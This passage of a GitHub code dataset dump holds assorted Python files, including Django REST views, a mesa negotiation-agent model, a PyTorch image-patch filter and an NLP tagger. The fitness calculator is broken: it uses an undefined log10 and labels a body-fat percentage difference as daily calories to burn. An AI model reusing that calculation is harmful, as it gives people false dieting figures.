issue_comment=\"{} {} Error: Check Job Logs\".format(stage, component))\n for ddb_key in ddb_keys:\n dynamo_interface.update_manifests_control_table_stageb(ddb_key, \"FAILED\",None,\"Glue Job Failed, Check Logs\")\n\n except Exception as e:\n logger.error(\"Fatal error\", exc_info=True)\n peh.PipelineExecutionHistoryAPI(octagon_client).retrieve_pipeline_execution(\n event['body']['job']['peh_id'])\n octagon_client.end_pipeline_execution_failed(component=component,\n issue_comment=\"{} {} Error: {}\".format(stage, component, repr(e)))\n for ddb_key in ddb_keys:\n dynamo_interface.update_manifests_control_table_stageb(\n ddb_key, \"FAILED\", None, \"Glue Job Failed, Check Logs\")\n raise e\n return response\n","repo_name":"awslabs/aws-serverless-data-lake-framework","sub_path":"sdlf-utils/pipeline-examples/manifests/stageB/lambda/stage-b-check-job/src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"61"}
+{"seq_id":"27221690622","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Projects, Comments, Models, Tools\nfrom .serializer import ProjectSerializer, CommentsSerializer, ModelsSerializer, ToolsSerializer\nfrom django.http import Http404\nfrom rest_framework import status\n\n\nclass ProjectList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_projects = Projects.get_all()\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectById(APIView):\n\tdef get(self, request, id,format=None):\n\t\tall_projects = Projects.get_id(id)\n\t\tserializers = ProjectSerializer(all_projects, many=False)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectByModels(APIView):\n\tdef get(self, request, models,format=None):\n\t\tall_projects = Projects.filter_tool(models)\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ProjectByTools(APIView):\n\tdef get(self, request, tools,format=None):\n\t\tall_projects = Projects.filter_model(tools)\n\t\tserializers = ProjectSerializer(all_projects, many=True)\n\t\treturn Response(serializers.data)\n\n\n\nclass ToolsList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_items = Tools.get_all()\n\t\tserializers = ToolsSerializer(all_items, many=True)\n\t\treturn Response(serializers.data)\n\n\nclass ModelsList(APIView):\n\tdef get(self, request, format=None):\n\t\tall_items = Models.get_all()\n\t\tserializers = ModelsSerializer(all_items, many=True)\n\t\treturn Response(serializers.data)\n\n\n\nclass CommentsList(APIView):\n\tdef get(self, request,format=None):\n\t\tall_comments = Comments.get_all()\n\t\tserializers = CommentsSerializer(all_comments, many=True)\n\t\treturn Response(serializers.data)\n\n\tdef post(self, request, format=None):\n\t\t\tserializers = CommentsSerializer(data=request.data)\n\t\t\tif serializers.is_valid():\n\t\t\t\t\tserializers.save()\n\t\t\t\t\treturn Response(serializers.data, status=status.HTTP_201_CREATED)\n\t\t\treturn Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"isaacwangombe/jess-render","sub_path":"Jessica/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44018857560","text":"from mesa import Model\nfrom mesa.time import RandomActivation\nimport random\n\nfrom communication.agent.CommunicatingAgent import CommunicatingAgent\nfrom communication.message.MessageService import MessageService\nfrom communication.message.MessagePerformative import MessagePerformative\nfrom communication.message.Message import Message\n\nfrom communication.preferences.CriterionName import CriterionName\nfrom communication.preferences.CriterionValue import CriterionValue\nfrom communication.preferences.Preferences import Preferences\nfrom communication.preferences.Item import Item\n\nfrom arguments.Argument import Argument\n\n\nclass ArgumentAgent(CommunicatingAgent):\n \"\"\"ArgumentAgent which inherit from CommunicatingAgent .\"\"\"\n\n def __init__(self, unique_id, model, name, preference, is_commited=False):\n super().__init__(unique_id, model, name)\n self.preference = preference\n self.is_commited = is_commited\n self.commited_val = None\n\n def step(self):\n super().step()\n if self.is_commited == True:\n pass\n else:\n messages = self.get_new_messages()\n if len(messages) != 0:\n for msg in messages:\n sender = msg.get_exp()\n performative = msg.get_performative()\n content = msg.get_content()\n if performative == MessagePerformative.PROPOSE:\n # get top 10% items according to the preference\n is_top_10_item = self.preference.is_item_among_top_10_percent(\n content, self.model.items\n )\n if is_top_10_item:\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ACCEPT,\n content,\n )\n self.send_message(message)\n print(message)\n else:\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ASK_WHY,\n content,\n )\n self.send_message(message)\n print(message)\n if performative == MessagePerformative.ASK_WHY:\n arg = Argument(True, content)\n prop = arg.support_proposal(content, self.preference)\n if prop != None:\n message = Message(\n self.get_name(), sender, MessagePerformative.ARGUE, arg\n )\n self.send_message(message)\n print(message)\n else:\n items_list = self.model.items.copy()\n items_list.remove(content)\n top_item = self.preference.most_preferred(items_list)\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.PROPOSE,\n top_item,\n )\n self.send_message(message)\n print(message)\n if performative == MessagePerformative.ARGUE:\n item = content.item\n couple_criterion = content.couple_values_list[0]\n is_proposing = content.decision\n if is_proposing:\n (\n same_critrion,\n criterion_name,\n criterion_val,\n ) = self.preference.better_criterion(\n item, couple_criterion.criterion_name\n )\n if same_critrion is None:\n # Accept prop\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ACCEPT,\n item,\n )\n self.send_message(message)\n print(message)\n else:\n if same_critrion:\n # bad local value\n arg = Argument(False, item)\n arg.add_premiss_couple_values(\n criterion_name, criterion_val\n )\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ARGUE,\n arg,\n )\n self.send_message(message)\n print(message)\n else:\n # bad on better criterion\n arg = Argument(False, item)\n arg.add_premiss_comparison(\n criterion_name, couple_criterion.criterion_name\n )\n arg.add_premiss_couple_values(\n criterion_name, criterion_val\n )\n message = Message(\n self.get_name(),\n sender,\n MessagePerformative.ARGUE,\n arg,\n )\n self.send_message(message)\n print(message)\n else:\n print(\"Response to negative ARG\")\n pass\n\n if performative in [\n 
MessagePerformative.ACCEPT,\n MessagePerformative.COMMIT,\n ]:\n message = Message(\n self.get_name(), sender, MessagePerformative.COMMIT, content\n )\n self.commited_val = content\n self.is_commited = True\n self.send_message(message)\n print(message)\n else:\n # get random agent\n agent_list = self.model.schedule.agents.copy()\n agent_list.remove(self)\n agent = random.choice(agent_list)\n # get the top item according to the preference\n top_item = self.preference.most_preferred(self.model.items)\n # print(self.get_name(),' top ',top_item)\n message = Message(\n self.get_name(),\n agent.get_name(),\n MessagePerformative.PROPOSE,\n top_item,\n )\n self.send_message(message)\n print(message)\n\n def get_preference(self):\n return self.preference\n\n def set_criteria(self, List_criteria):\n self.preference.get_criterion_name_list(List_criteria)\n\n def generate_preferences(self, List_items):\n List_criteria = self.preference.get_criterion_name_list()\n for i in List_items:\n for j in List_criteria:\n self.preference.add_criterion_value(\n CriterionValue(i, j, random.randint(0, 5))\n )\n\n\nclass ArgumentModel(Model):\n \"\"\"ArgumentModel which inherit from Model .\"\"\"\n\n def __init__(self, N, items, criteria):\n self.schedule = RandomActivation(self)\n self.__messages_service = MessageService(self.schedule)\n self.running = True\n self.items = items\n self.criteria = criteria\n\n for i in range(N):\n init_pref = Preferences()\n random.shuffle(self.criteria)\n init_pref.set_criterion_name_list(self.criteria)\n a = ArgumentAgent(i, self, \" agent_\" + str(i), init_pref)\n a.generate_preferences(self.items)\n self.schedule.add(a)\n\n def step(self):\n self.__messages_service.dispatch_messages()\n self.schedule.step()\n\n\nif __name__ == \"__main__\":\n # init list of items\n items = [\n Item(\"Diesel Engine\", \"A super cool diesel engine\"),\n Item(\"Electric Engine\", \"A very quiet engine\"),\n Item(\"Hybrid Engine\", \"A very efficient engine\"),\n Item(\"Petrol Engine\", \"A very cheap engine\"),\n Item(\"Gas Engine\", \"A very powerful engine\"),\n ]\n # init list of criteria\n criteria = [\n CriterionName.PRODUCTION_COST,\n CriterionName.ENVIRONMENT_IMPACT,\n CriterionName.CONSUMPTION,\n CriterionName.DURABILITY,\n CriterionName.NOISE,\n ]\n N = 3\n argument_model = ArgumentModel(N, items, criteria)\n # get the first agent\n agent = argument_model.schedule.agents[0]\n # get the preference of the first agent\n pref = agent.get_preference()\n # print(len(pref.get_criterion_value_list()))\n # for value in pref.get_criterion_value_list():\n # print(value.get_item(), value.get_criterion_name(), value.get_value())\n # get the second agent\n agent = argument_model.schedule.agents[1]\n # get the preference of the first agent\n pref = agent.get_preference()\n # print('agent 2')\n # for value in pref.get_criterion_value_list():\n # print(value.get_item(), value.get_criterion_name(), value.get_value())\n for i in range(20):\n print(\"__________________________________________________________________\")\n print(\"step \", i)\n argument_model.step()\n print(\"- - - - - - - - -- - - -- - - - - - - - - - -- - -- - - - \")\n for i in range(N):\n commited_value = argument_model.schedule.agents[i].commited_val\n if commited_value is not None:\n print(\"the agent \", i, \" is commited with value = \", commited_value)\n else:\n print(\"the agent \", i, \" is not 
commited\")\n\n","repo_name":"lidamsoukaina/Multi-agent_System","sub_path":"pw_argumentation.py","file_name":"pw_argumentation.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10273229951","text":"\"\"\"View module for handling requests for boards\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework.decorators import action\nfrom rest_framework.authtoken.models import Token\nfrom jobseekerapi.models import CustomPrepInfo, Seeker, InterviewPrep\n\n\nclass CustomPrepView(ViewSet):\n \"\"\"Board View\"\"\"\n\n def retrieve(self, request, pk):\n \"\"\"Handle GET requests for a single Board\n Returns:\n Response -- JSON Serialized Board\"\"\"\n try:\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n except:\n return Response(\n {\"message\": \"The custom prep info you requested does not exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n serializer = CustomPrepSerializer(custom_prep_info)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def list(self, request):\n custom_prep_infos = CustomPrepInfo.objects.all()\n serializer = CustomPrepSerializer(custom_prep_infos, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def create(self, request):\n\n interview_prep = InterviewPrep.objects.get(pk=request.data[\"prep\"])\n\n custom_prep_info = CustomPrepInfo.objects.create(\n prep=interview_prep,\n title = request.data[\"title\"],\n description = request.data[\"description\"],\n content = request.data[\"content\"],\n )\n\n serializer = CustomPrepSerializer(custom_prep_info)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def update(self, request, pk):\n\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n custom_prep_info.title = request.data[\"title\"]\n custom_prep_info.description = request.data[\"description\"]\n custom_prep_info.content = request.data[\"content\"]\n\n interview_prep = InterviewPrep.objects.get(pk=request.data[\"prep_id\"])\n custom_prep_info.prep_id = interview_prep\n custom_prep_info.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n custom_prep_info.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n\nclass SeekerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Seeker\n fields = (\"id\",\"current_role\", \"elevator_pitch\")\n\nclass CustomPrepSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CustomPrepInfo\n fields = (\"id\", \"prep_id\", \"title\", \"description\", \"content\")","repo_name":"jvw3/Job-Seeker-Server","sub_path":"jobseekerapi/views/custom_preps.py","file_name":"custom_preps.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"13652286899","text":"from process_config import notification_registration_client\nfrom base_doc import BaseDoc\n\n\nclass Notifications(BaseDoc):\n def undo(self):\n rev_list = self.get_rev_list()\n result = ''\n if self.action == 'add':\n result = self.undo_new()\n elif self.action == 'delete':\n result = self.undo_delete()\n else:\n result = self.undo_edit()\n return result\n\n def undo_new(self):\n self.doc['hidden'] = True\n ret = self.db.save_doc(self.doc)\n hidden = self.db.get(self.doc['_id'], rev=ret['rev'])\n notification_registration_client.delete(hidden, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n\n def undo_delete(self):\n del self.doc['hidden']\n self.doc['status'] = 'done'\n self.db.save_doc(self.doc, force_update=True)\n notification_registration_client.registration(self.doc, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n\n def undo_edit(self):\n rev_list = self.get_rev_list()\n prev = self.db.get(self.doc['_id'], rev=rev_list[0])\n self.doc['user'] = prev['user']\n ret = self.db.save_doc(self.doc)\n mod = self.db.get(self.doc['_id'], rev=ret['rev'])\n notification_registration_client.edit(mod, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n","repo_name":"rjspencer1989/phd_code","sub_path":"undo/doc_types/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5391278003","text":"# Define the target time frame and other relevant variables\ntarget_time_frame = 8 # weeks\n\n# Prompt the user for the target body fat percentage, current weight, age, and sex\ntarget_body_fat_percentage = float(\n input(\"Enter your target body fat percentage: \"))\ncurrent_weight = float(input(\"Enter your current weight in kilograms: \"))\ncurrent_age = float(input(\"Enter your current age: \"))\ncurrent_sex = input(\"Enter your sex (male or female): \")\n\n# Prompt the user for the relevant measurements\nheight = float(input(\"Enter your height in centimeters: \"))\nwaist = float(input(\"Enter your waist circumference in centimeters: \"))\nhip = float(input(\"Enter your hip circumference in centimeters: \"))\nneck = float(input(\"Enter your neck circumference in centimeters: \"))\n\n# Calculate the current body fat percentage using the U.S. Navy method\n# https://en.wikipedia.org/wiki/Body_fat_percentage#Measurement\nbody_fat_percentage = 86.010 * \\\n (1.20 * (log10(waist - neck) - log10(height))) - \\\n 70.041 * (log10(height)) + 36.76\nstarting_body_fat_percentage = round(body_fat_percentage, 2)\n\n# Calculate the total number of calories needed to maintain the current weight using the Harris-Benedict equation\nif current_sex == \"male\":\n bmr = 66.5 + (13.75 * current_weight) + \\\n (5.003 * height) - (6.755 * current_age)\nelse:\n bmr = 655.1 + (9.563 * current_weight) + \\\n (1.850 * height) - (4.676 * current_age)\ntotal_calories_needed = bmr * 1.2 # factor in slight activity level\n\n# Determine the number of calories that need to be burned per week to reach the target body fat percentage in the target time frame\ncalories_to_burn_per_week = (\n target_body_fat_percentage - starting_body_fat_percentage) / target_time_frame\n\n# Calculate the number of calories that need to be burned per day to reach the target body fat percentage in the target time frame\ncalories_to_burn_per_day = calories_to_burn_per_week / 7\n\n# Print the results\nprint(\"Your current body fat percentage is\", starting_body_fat_percentage, \"%\")\nprint(\"To reach a body fat percentage of\",\n target_body_fat_percentage, \"in\", target_time_frame, \"weeks,\")\nprint(\"you will need to burn\", calories_to_burn_per_day,\n \"calories per day on average.\")\n","repo_name":"TJBreezy/Health-and-Fitness-Programs","sub_path":"fitnesspal.py","file_name":"fitnesspal.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40639410682","text":"import torch\nimport torch.nn as nn\n\n\nclass PatchConv(nn.Module):\n def __init__(self, num_channels, patch_size):\n super(PatchConv, self).__init__()\n self.conv = nn.Conv2d(num_channels, 1, kernel_size=patch_size, stride=patch_size)\n\n def forward(self, x):\n batch_size, num_patches, num_channels, patch_height, patch_width = x.shape\n output = torch.zeros(batch_size, num_patches)\n for i in range(batch_size):\n for j in range(num_patches):\n output[i, j] = self.conv(x[i, j, :, :, :])\n\n return output\n\n\nclass ImagePatchFilter(nn.Module):\n def __init__(self, patch_size: int = 8, top_k: int = 8, heuristic: str = 'contrast', probabilistic: bool = True,\n prob: float = 0.5, decay_rate: float = 0.0, batch_size: int = 0, verbose: bool = False):\n \"\"\"\n The ImagePatchFilter class takes in a patch size, top_k, and probabilistic and returns a super class of the\n ImagePatchFilter class\n\n :param patch_size: The size of the patch to be extracted from the image, defaults to 8 (optional)\n :param top_k: The number of patches to select, defaults to 8 (optional)\n :param probabilistic: If True, the filter will return a probability distribution over the patches. If False, it will\n return the top k patches, defaults to True (optional)\n \"\"\"\n super(ImagePatchFilter, self).__init__()\n # Set the path prob\n self.counter = 0\n # Set the prob\n self.prob = prob\n # Set the batch size\n self.batch_size = batch_size\n # Set the decay rate\n self.decay_rate = decay_rate\n # Store the current epoch variable\n self.current_epoch = 0\n # Set the patch size\n self.patch_size = patch_size\n # Set the top k\n self.top_k = top_k\n # Set the probabilistic flag\n self.probabilistic = probabilistic\n # Set the verbose flag\n self.verbose = verbose\n # Set the heuristic type\n self.heuristic = heuristic\n\n def update_epoch(self, epoch):\n self.current_epoch = epoch\n\n def divide_in_patches(self, image):\n # Get the shape of the image tensor\n batch_size, num_channels, height, width = image.size()\n\n # Calculate the number of patches in the height and width dimensions\n num_patches_height = height // self.patch_size\n num_patches_width = width // self.patch_size\n\n # Reshape the image tensor to divide it into patches\n patches = image.view(batch_size, num_channels, num_patches_height, self.patch_size, num_patches_width,\n self.patch_size)\n patches = patches.permute(0, 2, 4, 1, 3, 5).contiguous()\n patches = patches.view(batch_size, num_patches_height * num_patches_width, num_channels, self.patch_size,\n self.patch_size)\n\n return patches\n\n def get_distribution_vector(self, patches, mode='contrast'):\n patches = patches.float()\n\n if mode == 'contrast':\n max_value, _ = torch.max(patches, dim=3)\n min_value, _ = torch.min(patches, dim=3)\n max_value, _ = torch.max(max_value, dim=3)\n min_value, _ = torch.min(min_value, dim=3)\n max_value, _ = torch.max(max_value, dim=2)\n min_value, _ = torch.min(min_value, dim=2)\n contrast_values = (max_value - min_value + 1e-8) / (max_value + min_value)\n\n return contrast_values\n\n if mode == 'entropy':\n entropy_values = torch.special.entr(patches + 1e-8).mean(dim=[2, 3, 4])\n\n return entropy_values\n\n if mode == 'variance':\n variance_values = patches.var(dim=[3, 4]).mean(dim=2)\n\n return variance_values\n\n if mode == 'conv':\n conv_operator = PatchConv(num_channels=patches.shape[2], patch_size=patches.shape[3])\n conv_values = conv_operator(patches)\n\n return conv_values\n\n def get_topk_patches_mask(self, patches, 
distribution_values):\n \"\"\"\n For each image in the batch, we get the top k patches based on the contrast values, and set the rest of the\n patches to zero\n\n :param patches: the patches extracted from the image\n :param distribution_values: a tensor of shape (batch_size, num_patches)\n :return: The patches that have the highest contrast values.\n \"\"\"\n # Get the shape of the patches tensor\n batch_size, num_patches, _, _, _ = patches.shape\n\n # Initialize a mask tensor to zero\n mask = torch.zeros_like(patches)\n\n # Loop over the patches and select the top k patches\n for i in range(batch_size):\n # Get the top k patches\n if self.probabilistic:\n # Sample patches from the probability distribution described by the contrast values\n probs = (distribution_values[i, :] - distribution_values[i, :].min()) / \\\n (distribution_values[i, :].max() - distribution_values[i, :].min())\n probs = torch.nan_to_num(probs, nan=1e-6, posinf=1e-6, neginf=1e-6)\n topk_patches_indices = torch.multinomial(probs, num_samples=self.top_k, replacement=False)\n else:\n # Select the top-k patches based on their contrast values\n topk_patches_indices = torch.topk(distribution_values[i, :],\n self.top_k, largest=True, sorted=True).indices\n # Set the mask to 1 for the top k patches\n mask[i, topk_patches_indices, :, :, :] = 1\n\n # Apply the mask to the patches tensor\n masked_patches = patches * mask\n\n return masked_patches\n\n def update_epoch(self):\n self.current_epoch = self.current_epoch + 1\n\n def update_branch_prob(self, epoch):\n if self.training:\n self.prob = self.prob / (1 + self.decay_rate * epoch)\n\n def random_binary(self, probability):\n \"\"\"\n Returns 0 or 1 with probability `probability`.\n \"\"\"\n distribution = torch.distributions.Bernoulli(probability)\n binary_value = distribution.sample()\n return binary_value.int()\n\n def forward(self, images):\n if not self.training:\n return images\n\n if self.counter == 0:\n print(\"\\nCurrent Epoch: \", self.current_epoch)\n print(\"Probability: \", self.prob)\n else:\n if self.counter % self.batch_size == 0:\n self.update_epoch()\n self.update_branch_prob(self.current_epoch)\n print(\"\\nCurrent Epoch: \", self.current_epoch)\n print(\"Probability: \", self.prob)\n self.counter = 0\n\n self.counter += 1\n flag = self.random_binary(self.prob)\n if flag:\n # Divide the input image into patches\n patches = self.divide_in_patches(images)\n # Calculate the contrast value for each patch\n contrast_values = self.get_distribution_vector(patches, self.heuristic)\n # Create a mask to set the non-selected patches to zero\n mask = self.get_topk_patches_mask(patches, contrast_values)\n # Reshape the mask tensor to match the input image tensor shape\n batch_size, num_patches, num_channels, patch_height, patch_width = mask.size()\n height = num_patches // (images.size(-1) // self.patch_size)\n width = num_patches // (images.size(-2) // self.patch_size)\n mask = mask.view(batch_size, height, width, num_channels, patch_height, patch_width)\n mask = mask.permute(0, 3, 1, 4, 2, 5).contiguous()\n mask = mask.view(batch_size, num_channels, height * patch_height, width * patch_width)\n # Return the filtered image\n return mask\n else:\n # Return the unfiltered image\n return images\n","repo_name":"MattiaLimone/HuggingGreen","sub_path":"src/hvit/decision_block/filter_block.py","file_name":"filter_block.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9668450640","text":"import matplotlib.pyplot as plt\n\ndef lectura(nombre):\n ar = open(nombre)\n fecha = ar.readline()\n fecha = fecha.rstrip('\\n')\n X = fecha.split(',')\n# X = ((ar.readline()).rstrip('\\n')).split(',')\n XX = list(range(len(X)))\n casos = ar.readline()\n casos = casos.rstrip('\\n')\n casos = casos.split(',')\n Y = []\n for elem in casos:\n Y.append(float(elem))\n return X, Y\n\ndef graficar(X, Y):\n plt.plot(X, Y)\n plt.show()\n\n\n\ndef finalizar(X, Y):\n print('Son', len(Y), 'dias' )\n\nif __name__ == \"__main__\":\n X, Y = lectura('TotalesNacionalesResumen.csv')\n x1, y1 = datos_por_mes(X, Y)\n # graficar(X, Y)\n # finalizar(X, Y)\n# xr, yr = resumen_por mes(X, Y)\n","repo_name":"Matias-Gutierrez/practica-con-python","sub_path":"clase 2 semestre/clase 5/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70576685955","text":"# O(n3) time | O(n2) space\n\nclass Solution:\n \n @staticmethod\n def maxCoins_recursive(nums: List[int]) -> int:\n cache = {}\n nums = [1] + nums + [1]\n\n def dfs(l, r):\n if l > r:\n return 0\n if (l, r) in cache:\n return cache[(l, r)]\n\n cache[(l, r)] = 0\n for i in range(l, r + 1):\n coins = nums[l - 1] * nums[i] * nums[r + 1]\n coins += dfs(l, i - 1) + dfs(i + 1, r)\n cache[(l, r)] = max(cache[(l, r)], coins)\n return cache[(l, r)]\n\n return dfs(1, len(nums) - 2)\n \n @staticmethod\n def maxCoins_iterative(nums: List[int]) -> int:\n cache = {}\n nums = [1] + nums + [1]\n\n for offset in range(2, len(nums)):\n for left in range(len(nums) - offset):\n right = left + offset\n for pivot in range(left + 1, right):\n coins = nums[left] * nums[pivot] * nums[right]\n coins += cache.get((left, pivot), 0) + cache.get((pivot, right), 0)\n cache[(left, right)] = max(coins, cache.get((left, right), 0))\n return cache.get((0, len(nums) - 1), 0)\n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/dynamic_programming/burst_balloons.py","file_name":"burst_balloons.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"6532483603","text":"from buildrelease.release_build import buildRelease\nimport sys, os, os.path\nimport getopt\n\ndef _captureVersion():\n\t\"\"\" get the dojo version info for the build\"\"\"\n\tversion = \"missing\"\n\ttmp = file ( os.path.normpath(os.path.join(os.path.dirname(__file__),'prmax/config/app.cfg')) )\n\tfor l in tmp.readlines():\n\t\tif l.find ( \"prmax.dojoversion =\" ) != -1:\n\t\t\tversion = l.split(\"\\\"\")[1]\n\t\t\tbreak\n\treturn version\n\n\nif __name__=='__main__':\n\topts, args = getopt.getopt(sys.argv[1:],\"\" , [\"live\",\"test\"])\n\tdone = False\n\tfor o, a in opts:\n\t\tif o in (\"--live\",):\n\t\t\tbuildRelease(True,True,_captureVersion())\n\t\t\tdone = True\n\t\tif o in (\"--test\",):\n\t\t\tbuildRelease(True,False,_captureVersion())\n\t\t\tdone = True\n\tif not done:\n\t\tprint (\"Missing Environment\")","repo_name":"meanang123/prmax","sub_path":"prmax/setup_dojo.py","file_name":"setup_dojo.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18685169300","text":"import os\nimport joblib\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nMODEL = os.path.join(os.path.realpath('..'), 'models')\nTABLE = {}\n\n\ndef mapping(data):\n values = data.split(' ')\n value = values[1]\n value = re.sub(r'[0-9]+', '', value)\n value = re.sub(r'[,.`´\\'\\\"!?;:*@%$()=+\\\\/_-]+', '', value)\n\n tag = values[0]\n tag = re.sub(r'[0-9]+', '', tag)\n tag = re.sub(r'[,.`´\\'\\\"!?;:*@%$()=+\\\\/_-]+', '', tag)\n if value == '' or tag == '':\n return ''\n else:\n return tag + ' ' + value\n\n\ndef read_dataset(path_dataset):\n print(\"Reading dataset from path\", path_dataset)\n file = open(path_dataset, 'r')\n data = {}\n\n for s in file:\n for c in range(len(s)):\n if s[c] == '(':\n value = []\n c += 1\n while s[c] != ')' and c < len(s) - 1:\n\n if s[c] == '(':\n value.clear()\n break\n else:\n value.append(s[c])\n c += 1\n if s[c] == ')':\n str1 = ''.join(value)\n str1 = mapping(str1)\n if str1 != '':\n if str1 in data:\n data[str1] += 1\n else:\n data[str1] = 1\n\n file.close()\n return data\n\n\ndef classify(value):\n candidates = []\n for key in TABLE:\n values = key.split(\" \")\n if values[1] == value:\n candidates.append([values[0], TABLE[key]])\n\n # Se não houver candidados retornar a tag mais comum\n best_candidate = ''\n value_best_candidate = -1\n if len(candidates) == 0:\n for key in TABLE:\n values = key.split(\" \")\n if TABLE[key] > value_best_candidate:\n value_best_candidate = TABLE[key]\n best_candidate = values[0]\n return best_candidate\n else:\n for candidate in candidates:\n if candidate[1] > value_best_candidate:\n best_candidate = candidate[0]\n value_best_candidate = candidate[1]\n return best_candidate\n\n\ndef print_confusion_matrix(tags, confusion_matrix):\n\n matrix = \" \"\n for i in range(len(tags)):\n matrix = matrix + tags[i] + \" \"\n matrix += \"\\n\"\n\n for i in range(len(tags)):\n line = tags[i] + \" \"\n for j in range(len(tags)):\n print(i, j)\n line += str(confusion_matrix[i][j])\n line += \" \"\n matrix = matrix + line + \"\\n\"\n print(matrix)\n\nif __name__ == '__main__':\n path = os.path.join(os.path.realpath('..'), 'data', 'traindata')\n\n if 'table.joblib' in os.listdir(MODEL):\n TABLE = joblib.load(os.path.join(MODEL, '{}.joblib'.format('table')))\n else:\n TABLE = read_dataset(path)\n joblib.dump(TABLE, os.path.join(MODEL, '{}.joblib'.format('table')))\n\n path_test = os.path.join(os.path.realpath('..'), 'data', 'test')\n test_data = read_dataset(path_test)\n\n total = 0\n acertos = 0\n erros = 0\n\n tags = {}\n count = 0\n for key in test_data:\n values = key.split(\" \")\n if values[0] not in tags:\n tags[values[0]] = count\n count += 1\n for key in TABLE:\n values = key.split(\" \")\n if values[0] not in tags:\n tags[values[0]] = count\n count += 1\n print(tags)\n\n tags_list = []\n for key in tags:\n tags_list.append(key)\n\n confusion_matrix = np.full((len(tags_list), len(tags_list)), 0)\n for key in test_data:\n values = key.split(\" \")\n word = values[1]\n classified = classify(word)\n total += test_data[key]\n\n index_classified = tags[classified]\n index_original = tags[values[0]]\n confusion_matrix[index_classified][index_original] += 1\n\n if classified == values[0]:\n acertos += test_data[key]\n else:\n erros += test_data[key]\n\n print_confusion_matrix(tags_list, confusion_matrix)\n print('total:', total)\n print('acertos:', acertos)\n print('erros:', erros)\n print('accuracia:', acertos/total)\n\n df_cm = 
pd.DataFrame(confusion_matrix, index=[i for i in tags_list],\n columns=[i for i in tags_list])\n plt.figure(figsize=(len(tags_list), len(tags_list)))\n sns_plot = sns.heatmap(df_cm, annot=True, cmap='coolwarm', linecolor='white', linewidths=1)\n figure = sns_plot.get_figure()\n figure.savefig('output.png', dpi=100)\n # fig, ax = plt.subplots()\n # im = ax.imshow(confusion_matrix)\n #\n # # We want to show all ticks...\n # ax.set_xticks(np.arange(len(tags_list)))\n # ax.set_yticks(np.arange(len(tags_list)))\n # # ... and label them with the respective list entries\n # ax.set_xticklabels(tags_list)\n # ax.set_yticklabels(tags_list)\n #\n # # Rotate the tick labels and set their alignment.\n # plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n # rotation_mode=\"anchor\")\n #\n # # Loop over data dimensions and create text annotations.\n # for i in range(len(tags_list)):\n # for j in range(len(tags_list)):\n # text = ax.text(j, i, confusion_matrix[i, j],\n # ha=\"center\", va=\"center\", color=\"w\")\n #\n # ax.set_title(\"Confusion Matrix\")\n # fig.tight_layout()\n # plt.savefig(\"confusion_matrix.png\")\n\n\n\n","repo_name":"gbrsouza/NLP","sub_path":"module1/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
